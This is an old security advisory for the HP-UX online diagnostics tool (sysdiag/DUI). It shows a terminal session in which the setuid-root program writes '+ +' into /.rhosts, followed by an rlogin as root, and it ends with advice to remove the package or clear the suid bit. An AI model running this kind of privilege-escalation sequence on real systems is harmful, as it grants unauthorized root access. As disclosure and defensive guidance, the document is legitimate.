/usr/diag/bin/DUI (called by /bin/sysdiag)


    HP-UX all versions


    The sysdiag  program is  the interface  to the  online diagnostics
    subsystem.  When  started,  this  program  runs  /usr/diag/bin/DUI
    which  is  suid  root.   Here  is  the example (well, exploit) for
    .rhosts file (+ +)

    (tested on hp720/9000, DUI ver.A.02.18)

        $ ls -al /bin/sysdiag
        -r-sr-xr-x   1 0        bin           18 Nov 30  1992 /bin/sysdiag

        $ /bin/sysdiag

        ******                                                     ******
        ******               ONLINE DIAGNOSTIC SYSTEM              ******
        ******                                                     ******
        ****** (C) Copyright Hewlett Packard Co. 1987, 1989, 1990  ******
        ******                 All Rights Reserved                 ******
        ******                                                     ******
        ******              DUI Version A.02.18                    ******
        ******         Diagnostic Monitor Version   A.02.19        ******
        ******                                                     ******

        Type "HELP" for assistance.

        DUI >outfile /.rhosts
        DUI >+ +
        *** SYNTAX ERROR (DUISERR 501)

        DUI >redo
        + +
        (press enter)
        DUI >+ +
        *** SYNTAX ERROR (DUISERR 501)

        DUI >exit
        $ ls -al /.rhosts
        -rwxr-xr-x   1 0        users        891 Nov 17 04:25 /.rhosts
        $ rlogin localhost -l root

        ps. the error message "     ^                        "
                           *** SYNTAX ERROR (DUISERR 501)
        is show in screen after keyin command.


    If you  do not  need to  do system  diagnostics, you should remove
    this  whole  package.  The  package  includes  all  the  files  in
    /usr/diag/bin and the file /bin/sysdiag. If you need to keep  this
    package, you  should change  the permissions  on all  the files in
    /usr/diag/bin and the file  /bin/sysdiag to owner only  access and
    clear the suid bit.  Check that all the  files are owned by  root.
    Normal users will no longer be able to use sysdiag but the  system
    manager will be able to do so when logged in as root.